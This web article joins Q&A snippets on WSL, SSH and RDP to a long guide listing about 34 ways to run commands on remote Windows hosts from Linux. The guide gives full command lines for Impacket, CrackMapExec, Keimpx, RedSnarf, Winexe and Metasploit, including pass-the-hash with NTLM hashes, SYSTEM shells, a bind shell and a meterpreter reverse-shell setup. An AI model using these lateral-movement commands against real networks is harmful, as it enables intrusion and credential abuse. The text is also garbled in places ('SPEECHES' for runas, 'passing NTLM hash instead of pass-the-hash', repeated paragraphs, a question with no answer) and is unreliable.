Remote windows commands from linux

If you have access to the computer, install an ssh server on it. On Linux you can use for example Overlook-Fing to find the IP of the computer. Then you type ssh username@ipaddress into the Linux shell. Then type the user’s password and you should have access to the computer’s Windows Command Prompt.

Can Linux run Windows commands?

The Windows Subsystem for Linux (WSL) allows you to run Linux inside Windows. You can find some popular Linux distributions like Ubuntu, Kali Linux, openSUSE etc in Windows Store. You just have to download and install it like any other Windows application. Once installed, you can run all the Linux commands you want.

Can I run CMD on Linux?

Batch files can be run by typing “start FILENAME. bat”. Alternately, type “wine cmd” to run the Windows-Console in the Linux terminal. When in the native Linux shell, the batch files can be executed by typing “wine cmd.exe /c FILENAME.

How do I run Linux commands on Windows 10?

Windows Subsystem for Linux(WSL)

1. Step 1: Go to Update and Security in Settings.
2. Step 2: Go to the Developer’s Mode and Select the Developer’s Mode option.
3. Step 3: Open the Control Panel.
4. Step 4: Click Programs and Features.
5. Step 5: Click Turn Windows Features On or Off.

Does Psexec work on Linux?

Thanks to an updated winexe hosted at http://sourceforge.net/p/winexe/wiki/Home/ psexec in linux is possible.

Is Windows a Linux terminal?

Windows Terminal is a modern terminal application for users of command-line tools and shells like Command Prompt, PowerShell, and Windows Subsystem for Linux (WSL).

Can I practice Linux commands online?

Webminal is an impressive online Linux terminal, and my personal favorite when it comes to a recommendation for beginners to practice Linux commands online. The website offers several lessons to learn from while you type in the commands in the same window.

Can you run bash scripts on Windows?

With the arrival of Windows 10’s Bash shell, you can now create and run Bash shell scripts on Windows 10. You can also incorporate Bash commands into a Windows batch file or PowerShell script.

How to run Linux commands on Windows 10?

Here are some ways to run Linux commands on Windows. Step 1: Go to Update and Security in Settings. Step 2: Go to the Developer’s Mode and Select the Developer’s Mode option. Step 3: Open the Control Panel. Step 4: Click Programs and Features. Step 5: Click Turn Windows Features On or Off.

Can you run Linux in command line mode?

The upcoming version of WSL will be using the real Linux kernel inside Windows. This WSL, also called Bash on Windows, gives you a Linux distribution in command line mode running as a regular Windows application. Don’t be scared with the command line mode because your purpose is to run Linux commands. That’s all you need.

What happens when I run a Linux program in command prompt?

When launching a Linux application in the command prompt, the command will interact with the Windows file system rather than the Linux distribution filesystem. The Linux application’s output will also be displayed directly in the command prompt so that other Windows programs can use it.

How to run Linux binaries from Windows Command Prompt?

Run Linux binaries from the Windows Command Prompt (CMD or PowerShell) using wsl.exe <command>. Binaries invoked in this way: Use the same working directory as the current CMD or PowerShell prompt. Run as the WSL default user.

Can I run Linux code on Windows?

5 Ways to Run Linux Software on Windows Virtual Machines. Virtual machines allow you to run any operating system in a window on your desktop. Cygwin. Cygwin is a collection of tools that offer a Linux-like environment on Windows. Install Ubuntu via Wubi. This method is technically installing Linux, not running Linux software on Windows. Ported and Compiled Programs. coLinux-based Distributions.

How do I install Linux with Windows?

Install Ubuntu Linux From the Microsoft Store. To install any version of Linux on Windows, you’ll first need to install the Windows Subsystem for Linux. Right-click Start and open Windows PowerShell (Admin), then enter this command: Wait while the process completes, then when prompted, enter Y to restart your computer.

Can I run Windows .exe file on Linux?

The exe file will either execute under Linux or Windows, but not both. Executes Under Windows. If the file is a windows file, it will not run under Linux on it’s own. So if that’s the case, you could try running it under a Windows compatibility layer (Wine).

Can I run Linux shell script in Windows?

Shell Scripts or .SH files are like batch files of Windows which can be executed in Linux or Unix. It is possible to run .sh or Shell Script file in Windows 10 using Windows Subsystem for Linux. In this post, we will show you how to run a Shell Script file in Windows 10.

Can I run Linux commands on Windows?

Can you RDP from Linux to Windows?

As you can see, it is easy to establish a remote desktop connection from Linux to Windows. The Remmina Remote Desktop Client is available by default in Ubuntu, and it supports the RDP protocol, so connecting remotely to a Windows desktop is almost a trivial task.

How do I run a Windows script in Linux?

Run Windows tools from Linux WSL can run Windows tools directly from the WSL command line using [tool-name].exe . For example, notepad.exe . Applications run this way have the following properties: Retain the working directory as the WSL command prompt (for the most part — exceptions are explained below).

How do I run a Linux script in Windows?

Execute Shell Script Files

1. Open Command Prompt and navigate to the folder where the script file is available.
2. Type Bash script-filename.sh and hit the enter key.
3. It will execute the script, and depending on the file, you should see an output.

How do I access a Linux machine remotely?

1. Step 1: Enable SSH on your machine. Linux has many distributions and you will need to enable SSH on your machine to access it remotely.
2. Step 2: Set up Port Forwarding (Port Translation) in the router.
3. STEP 4: Map your dynamic IP to a hostname.
4. STEP 5: Use Dynu DDNS service to access your machine remotely.

Can you ssh into a Windows computer?

The SSH client is a part of Windows 10, but it’s an “optional feature” that isn’t installed by default. To install it, head to Settings > Apps and click “Manage optional features” under Apps & features. Windows 10 also offers an OpenSSH server, which you can install if you want to run an SSH server on your PC.

How do I RDP from Linux to Windows 10?

How to RDP: Linux to Windows 10

1. Install Windows 10 Pro.
2. In Windows 10 Pro, type “remote” into Cortana search and click to Allow remote access:
3. On your Windows machine, open the command prompt (you can search in Cortana if you aren’t sure where it is) and run “ipconfig”

Can I RDP into Ubuntu?

The easiest option is to use Remote Desktop Protocol or RDP. Built into Windows, this tool can establish a remote desktop connection across your home network. All you need is the IP address of the Ubuntu device. Wait for this to install, then run the Remote Desktop application in Windows using the Start Menu or Search.

How to remotely control Linux systems from Windows?

Go to your windows system and in search bar type “RDP.” Click on the “Remote Desktop App.” Type the IP address of your Linux system adjacent to the “Computer ” label, and click connect Enter the Username and the Password of your Linux system.

How can I remotely access my Ubuntu computer?

To establish the connection, you would need to access the Ubuntu machine physically. But don’t worry, this is a one-time thing. There are many methods through which you can remotely access your Linux from windows. Here I will be sharing three ways through which you can access remotely control Linux Systems from Windows.

How do I run graphical programs remotely from a Linux server?

This is a popular tool that lets you run a VNC server on the remote linux server and connect to it using a VNC client on your local system. There is more information about this option in Using VNC via ssh tunneling. We do not recommend using this approach and RDP support on the linux systems may disappear at any time.

How to execute a command on a remote Linux system?

Execute Commands On Remote Linux Systems Via SSH. The typical way to run a command or script on a remote system over SSH from the local system is: $ ssh < username@IP _Address-or-Doman_name> . Allow me to show you some examples.

Can you run bash on a remote system?

If you don’t specify ‘bash -s’ in the above command, you will get the details of the remote system but Pseudo-terminal will not be allocated. This can be useful if you want to share the output of a command that you run on the remote system over SSH with your support team or colleague.

To establish the connection, you would need to access the Ubuntu machine physically. But don’t worry, this is a one-time thing. There are many methods through which you can remotely access your Linux from windows. Here I will be sharing three ways through which you can access remotely control Linux Systems from Windows.

How to start a GUI software on a remote Linux PC?

You first ssh to the remote computer with the additional -Y option and the run the application (e.g. firefox): If -Y doesn’t work check you sshd config on the remote PC (see Denis Lukinykh’s answer). Another similar option is -X. Google for the differences. You need to login with user A at the remote PC and leave the session open.

This article contains a set of methods for connecting to a remote Windows system from Linux and examples of how to execute commands on Windows machines remotely from Linux using a number of different tools. And we’ll look at how to remotely access Windows systems from Linux. It covers over 30 different methods of getting a remote shell, executing commands remotely, or connecting to a remote desktop using a variety of freely available tools and utilities.

There are many different tools that you can use to access and execute commands on a remote Windows computer from Linux. Here is a list of the existing tools described in this article that you can use for this task.

Tools for remote command or remote shell access:

• Impact
• CrackMapExec
• PTH tool kit
• Keimpx
• Metasploit
• Redsnarf
• Winexe
• SMBMap

Remote Plotting Tools:

• Rdesktop
• FreeRDP (xfreerdp)
• TightVNC (xtightvncviewer)
• TigerVNC (xtigervncviewer)

All of these tools are open source and freely available on any Linux distribution (Kali, Ubuntu, Debian, Arch, CentOS, RedHat, Parrot ..), including UNIX-based platforms such as BSD, Mac OS X and many others.

Most of these tools work by connecting to an SMB port (tcp / 445) on a remote Windows machine, but some of them also use other interfaces such as WMI, MMC, DCOM, NetBIOS and of course RDP or VNC in case of connecting to a remote (graphical) desktop.

More details on this are included in the overview table below.

Overview table

The following table summarizes all of the remote access methods that are described in this article.

You can see what type of remote execution is possible using each method, as well as details of which network ports are used during the connection.

Remote access methods from the command line

This section contains all the remote command line methods that you can use to remotely execute commands on a Windows machine from Linux, including creating an interactive shell (cmd.exe or powershell.exe).

IMPORTANT:  You must provide administrator credentials to use these methods. This applies to all methods described below.

Now let’s move on to real methods and techniques.

Impact

Impacket is a Python library for working with various Windows networking protocols. It is used by many different penetration testing tools and contains a number of techniques for executing commands on remote Windows computers.

This is how we can use Impacket to execute commands on a remote Windows system:

1.Impacket psexec.py

This will create an interactive remote shell using the Psexec method:

psexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
psexec.py "./Administrator:pass123"@192.168.0.1

2. Impacket dcomexec.py

This will create a semi-interactive remote shell using DCOM:

dcomexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
dcomexec.py "./Administrator:pass123"@192.168.0.1

3. Impacket smbexec.py

This will create a semi-interactive remote shell via built-in Windows SMB functions:

smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
smbexec.py "./Administrator:pass123"@192.168.0.1

4. Impacket wmiexec.py

This will create a semi-interactive remote shell using WMI:

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
wmiexec.py "./Administrator:pass123"@192.168.0.1

5. Impacket atexec.py

This will execute the command remotely via Atsvc:

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET> <COMMAND>
atexec.py "./Administrator:pass123"@192.168.0.1 "whoami"

Note:  Impacket also supports a hash authentication method, which allows you to use an NTLM hash instead of a password. Here’s an example with  psexec.py :

psexec.py -hashes <LM>:<NTLM> <DOMAIN>/<USER>@<TARGET>
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 "./Administrator"@192.168.0.1

Detailed information on these methods with even more examples and screenshots can be found  here.

CrackMapExec

CrackMapExec is the Swiss Army Pentest Knife. It has many useful features and integrates with a number of other security projects such as Mimikatz, Empire, PowerSploit, or Metasploit.

It also contains a number of methods for executing commands on remote Windows machines.

Here’s how to use CrackMapExec to execute commands on remote systems:

6. CrackMapExec wmiexec

This will execute the command (CMD / PowerShell) remotely using WMI:

crackmapexec smb -d <DOMAIN> -u <USER> -p <PASSWORD> -x <COMMAND> <TARGET> crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.0.1

7. CrackMapExec atexec

This will execute the command (CMD / PowerShell) remotely via Atsvc:

crackmapexec smb --exec-method atexec -d <DOMAIN> -u <USER> -p <PASSWORD> -x <COMMAND> <TARGET>
crackmapexec smb --exec-method atexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.0.1

8. CrackMapExec smbexec

This will execute the command (CMD / PowerShell) remotely using native SMB:

crackmapexec smb --exec-method smbexec -d <DOMAIN> -u <USER> -p <PASSWORD> -x <COMMAND> <TARGET>
crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.0.1

9. CrackMapExec mmcexec

This will execute the command (CMD / PowerShell) remotely via MMC:

crackmapexec smb --exec-method mmcexec -d <DOMAIN> -u <USER> -p <PASSWORD> -x <COMMAND> <TARGET>
crackmapexec smb --exec-method mmcexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.0.1

10. CrackMapExec winrm

This will execute the command (CMD / PowerShell) remotely using PSRemoting:

crackmapexec winrm -d <DOMAIN> -u <USER> -p <PASSWORD> -x <COMMAND> <TARGET>
crackmapexec winrm -d . -u Administrator -p 'pass123' -x "whoami" 192.168.0.1

Note:  Although CrackMapExec only lets you run a command on a remote system, we can still use it to create an interactive shell using the PowerShell reverse shell cmdlet (for example, some  of them ).

CrackMapExec also supports passing NTLM hash instead of pass-the-hash. Here’s an example with wmiexec:

crackmapexec smb -d <DOMAIN> -u <USER> -H <LM:NTLM> -x <COMMAND> <TARGET>
crackmapexec smb -d . -u Administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -x "cmd /c whoami" 192.168.0.1

More information on CrackMapExec with examples and screenshots can be found  here .

PTH tool kit

The PTH Toolkit  is a set of utilities created by the pioneers of the hashing transfer technique. It contains a number of useful tools for connecting to remote Windows machines, some of which are also designed to run commands on remote Windows systems.

Here’s how to use all of the PTH Toolkit remote access features:

11. PTH Toolkit: pth-winexe

This will create an interactive remote shell using a method similar to Psexec:

pth-winexe -U <DOMAIN>\\<USER>%<PASSWORD> --uninstall //<TARGET> <COMMAND>
pth-winexe -U ".\Administrator%pass123" --uninstall //192.168.0.1 cmd

Note that pth-winexe can also automatically expand to the “nt Authority \ system” account using the “–system” parameter.

12. PTH Toolkit: pth-wmis

This will execute the command remotely using WMI:

pth-wmis -U <DOMAIN>\\<USER>%<PASSWORD> //<TARGET> <COMMAND>
pth-wmis -U ".\Administrator%pass123" //192.168.0.1 'cmd.exe /c whoami'

Please note that this particular method does not return command output. If we want the result, we have to get it using the additional utility pth-smbget.

Note: The PTH Toolkit of course also supports providing an NTLM hash instead of a pass-the-hash. Here’s an example with pth-winexe:

pth-winexe -U <DOMAIN>\\<USER>%<LM|NTLM> --uninstall //<TARGET> <COMMAND>
pth-winexe -U ".\Administrator%aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76" --uninstall //192.168.0.1 cmd

More information on the PTH Toolkit with examples and screenshots can be found  here :

Keimpx

Keimpx is an NCC Group lab tool designed for penetration testing of Windows environments. It has many interesting features such as working with network shares or registry hives, resetting hashes and remote retrieval of NTDS files, and of course a number of methods for executing commands remotely on Windows systems.

Here’s how to use Keimpx to execute commands remotely.

First, we need to launch Keimpx with the target list to connect to. Here we are connecting to one machine:

keimpx.py -D <DOMAIN> -U <USER> -P <PASSWORD> -t <TARGET>
keimpx.py -D . -U Administrator -P pass123 -t 192.168.0.1

Now there will be an interactive menu in which we can choose what we want to do.

Here is a list of all the supported methods available on the menu for executing commands or creating wrappers:

13. Keimpx: svcexec

This runs the command on the remote system using a Windows service. Enter in the menu:

svcexec <COMMAND>
svcexec "dir c:\users"

14. Keimpx: svcexec SERVER

The svcexec SERVER method also executes the command, but it is designed for more limited systems that do not have writeable network resources:

svcexec <COMMAND> SERVER
svcexec "dir c:\users" SERVER

15. Keimpx: svcshell

This will create a semi-interactive shell on the remote system using a windows service:

svcshell

16. Keimpx: svcshell SERVER

Svcshell also supports SERVER mode, which can spawn a remote shell on more limited systems without any writable network resource:

svcshell SERVER

17. Keimpx: atexec

This runs the command on the remote system via Atsvc:

atexec <COMMAND>
atexec "dir c:\users"

18. Keimpx: psexec

This method can execute any command on the remote system, including interactive commands such as cmd.exe or powershell.exe:

psexec <COMMAND>
psexec cmd.exe
psexec powershell.exe

19. Keimpx: bindshell

This method spawns the binding wrapper on the target Windows machine on the selected TCP port:

bindshell <PORT>
bindshell 4444

Keimpx will automatically connect to it and provide us with a remote shell.

Note:  Keimpx also of course supports passing NTLM hashes instead of pass-the-hash authentication passwords. Here’s how to connect using a hash:

keimpx.py -D <DOMAIN> -U <USER> --lm=<LM> --nt=<NTLM> -t <TARGET>
keimpx.py -D . -U Administrator --lm=aad3b435b51404eeaad3b435b51404ee --nt=5fbc3d5fec8206a30f4b6c473d68ae76 -t 192.168.0.1

More information on Keimpx with examples and screenshots can be found  here :

Metasploit

The Metasploit Framework probably needs no introduction. It is one of the most comprehensive penetration testing platforms with over 4,280 different modules and exploits. Naturally, some of these modules are designed to run commands on remote Windows systems.

Here’s how to use it for remote execution.

First, we need to run msfconsole from the command line, and then we can use any of the following methods:

20. Metasploit: wmiexec

The wmiexec module  uses WMI to execute commands on a remote system. Here’s an example:

use auxiliary/scanner/smb/impacket/wmiexec
set RHOSTS <TARGET-IP>
set SMBUser Administrator
set SMBPass pass123
set SMBDomain .
set COMMAND "whoami"
run

21. Metasploit: dcomexec

The dcomexec module  can execute a command on a remote system using various DCOM objects such as:

• MMC20
• ShellWindows
• ShellBrowserWindow

These objects can be selected by setting the OBJECT option (install OBJECT ..) in msfconsole.

Here is an example of executing a command on a remote system using the dcomexec method:

use auxiliary/scanner/smb/impacket/dcomexec
set RHOSTS <TARGET-IP>
set SMBUser Administrator
set SMBPass pass123
set SMBDomain .
set COMMAND "whoami"
run

22. Metasploit: psexec

Module  Metasploit psexec  may carry any payload (e.g., inverse envelope) using the following 4 methods:

• PowerShell
• Native upload
• MOF upload
• Command

These methods can be selected using the target parameter (set target 1-4) in msfconsole.

Here’s an example of getting a reverse shell using a custom boot method:

use exploit/windows/smb/psexec
set RHOSTS <TARGET-IP>
set SMBUser Administrator
set SMBPass pass123
set SMBDomain .
set target 2
set payload windows/x64/meterpreter/reverse_winhttps
set LHOST <YOUR-IP>
set LPORT <PORT>
run

Note. Metasploit, of course, supports passing NTLM hashes for authentication instead of pass-the-hash. To use, just set the SMBPass parameter like this:

set SMBPass <LM>:<NTLM>
set SMBPass aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

More information on Metasploit RCE capabilities with examples and screenshots can be found  here :

RedSnarf

RedSnarf  is another penetration and red team testing utility developed by the NCC Group labs. It offers several unique features for penetration testing of Windows systems, including a number of methods for executing commands remotely.

Here’s how to use it.

First, we need to run RedSnarf with a target to connect. For example:

redsnarf -H ip=<TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD> -uD y
redsnarf -H ip=192.168.0.1 -d . -u Administrator -p pass123 -uD y

Now there will be an interactive menu in which we can choose what we want to do.

There are 4 supported methods for executing a command or shell on a target Windows system:

23. RedSnarf: SYSTEM shell

Pressing ‘s’ on the menu will bring up an interactive shell with SYSTEM privileges (nt Authority \ system) on the remote system using a method similar to Psexec.

24. RedSnarf: Admin shell

Pressing ‘n’ on the menu will bring up an interactive shell running in the context of the provided administrative username (without going to SYSTEM).

25. RedSnarf: WMI shell

Pressing the “w” key on the menu will bring up a semi-interactive shell via WMI.

26. RedSnarf: XCOMMAND

We can also simply execute the provided command on the remote system by running RedSnarf like this:

redsnarf -H ip=<TARGET> -d <DOMAIN> -u <USER> -p <PASSWORD> -uX <COMMAND>
redsnarf -H ip=192.168.0.1 -d . -u Administrator -p pass123 -uX "whoami"

Note. RedSnarf naturally also supports passing NTLM hashes for authentication instead of pass-the-hash. Here’s how to connect using a hash:

redsnarf -H ip=<TARGET> -d <DOMAIN> -u <USER> -p <LM>:<NTLM> -uD y
redsnarf -H ip=192.168.0.1 -d . -u Administrator -p aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 -uD y

More information on RedSnarf with examples and screenshots can be found  here :

Winexe

Winexe  is a small Linux utility designed to remotely execute commands on Windows systems using the SMB protocol. It doesn’t do many other things, but it works very well and has a built-in Runas function that can be quite handy at times.

Here are all the methods for accessing remote Windows systems using Winexe:

27. Winexe

By default Winexe runs a command remotely, which can also be an interactive command like cmd.exe or powershell.exe to get a shell:

winexe --uninstall -U <DOMAIN>/<USER>%<PASSWORD> //<TARGET> <COMMAND>
winexe --uninstall -U ./Administrator%"pass123" //192.168.0.1 cmd

28. Winexe: SYSTEM

This will execute the provided commands with SYSTEM privileges (NT Authority \ system) on the remote system:

winexe --uninstall --system -U <DOMAIN>/<USER>%<PASSWORD> //<TARGET> <COMMAND>
winexe --uninstall --system -U ./Administrator%"pass123" //192.168.0.1 cmd

29. Winexe: SPEECHES

Winexe can also execute commands under a specified Windows account on a remote system by automatically logging in (Runas):

winexe --uninstall --runas=<DOMAIN>/<USER>%<PASSWORD> -U <DOMAIN>/<USER>%<PASSWORD> //<TARGET> <COMMAND>
winexe --uninstall --runas=./bob%secret123 -U ./Administrator%"pass123" //192.168.0.1 cmd

The built-in Runas function can be especially useful in situations where we want to run something under a specific user profile.

Note. Winexe does not have built-in support for hash transfer, but installing the hash transfer package makes it possible. This is because the hash transfer package contains a hash transfer support library and is wrapped around Winexe via LD_PRELOAD.

Here’s how to pass a hash instead of a password to Winexe:

winexe --uninstall -U <DOMAIN>/<USER>%<LM><NTLM> //<TARGET> <COMMAND>
winexe --uninstall -U "./Administrator%aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76" //192.168.0.1 cmd

More information on Winexe can be found  here :

SMBMap

SMBMap  is primarily an enumerator for SMB / CIFS shared drives, however it can also execute commands on a remote Windows system.

30. SMBMap

Run the command on the remote system via native SMB:

smbmap -d <DOMAIN> -u <USER> -p <PASSWORD> -H <TARGET> -x <COMMAND>
smbmap -d . -u 'Administrator' -p 'pass123' -H 192.168.0.1 -x 'whoami'

Note. SMBMap also natively supports hash authentication. Here’s how to pass the hash to SMBMap:

smbmap -d <DOMAIN> -u <USER> -p <LM:NTLM> -H <TARGET> -x <COMMAND>
smbmap -d . -u 'Administrator' -p 'aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76' -H 192.168.0.1 -x 'whoami'

We can also create a remote interactive shell using SMBMap, similar to CrackMapExec, by running a PowerShell cmdlet (for example, some of them).

More information on SMBMap with examples can be found  here :

Graphical Remote Access Methods

This section contains methods for connecting to remote Windows systems from Linux through graphical user interfaces such as RDP or VNC.

Rdesktop

Rdesktop  is a popular open source RDP client that supports most Windows operating systems, officially up to Windows Server 2012 RDS. It has many useful features including support for network drives, media and USB redirection, bi-directional clipboard, and more. This project is currently looking for a new maintainer.

31. Rdesktop

Here’s how to open an RDP session on a remote Windows machine using rdesktop:

rdesktop -d <DOMAIN> -u <USER> -p <PASSWORD> <TARGET>
rdesktop -d . -u bob -p pass123 192.168.0.1

Here are some useful rdesktop options:

FreeRDP

FreeRDP  is another very popular RDP client for Linux (xfreerdp) that also has many cool features like network drive support, media and USB redirection, bi-directional clipboard, and more.

32. FreeRDP: xfreerdp

Here’s how to open an RDP session on a remote Windows machine using xfreerdp:

xfreerdp /d:<DOMAIN> /u:<USER> /p:<PASSWORD> /v:<TARGET>
xfreerdp /d:. /u:bob /p:pass123 /v:192.168.0.1

Here are some useful xfreerdp options:

Note. FreeRDP also supports passing NTLM hashes instead of pass-the-hash, here’s how to use it:

xfreerdp /d:<DOMAIN> /u:<USER> /pth:<NTLM> /v:<TARGET>
xfreerdp /d:. /u:bob /pth:D0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.0.1

However, this only works on Windows 2012 R2 and Windows 8.1 (details  here ).

TightVNC

TightVNC is a lightweight VNC client software for Linux (xtightvncviewer) that provides a fast and reliable way to connect to all types of VNC servers, not just those running on Windows.

33. TightVNC: xtightvncviewer

Here’s how to open a VNC connection to a remote Windows machine using xtightvncviewer:

xtightvncviewer <TARGET>
xtightvncviewer 192.168.0.1

We will be prompted to authenticate if required.

Here are some useful options for xtightvncviewer:

TigerVNC

TigerVNC is another popular VNC software with a Linux client (xtigervncviewer) with many useful features. For example, it supports clipboard, advanced authentication methods, TLS encryption, and other things.

Here’s how to use it.

34. TigerVNC: xtigervncviewer

Here’s how to open a VNC connection to a remote Windows machine using xtigervncviewer:

xtigervncviewer <TARGET>
xtigervncviewer 192.168.0.1

We will be prompted to authenticate if required.

Here are some useful options for xtigervncviewer:

Conclusion

You can also connect to a remote Windows computer without any personalization steps. However, this means that you will have to reconfigure your Remote Desktop Connection profile the next time you remotely control your Windows PC. Unlimited Internet tariff with high connection speed has simplified the administration of computers. Today, more and more help is provided to users remotely. This is convenient because you do not have to waste time on travel, and communication is possible almost around the clock.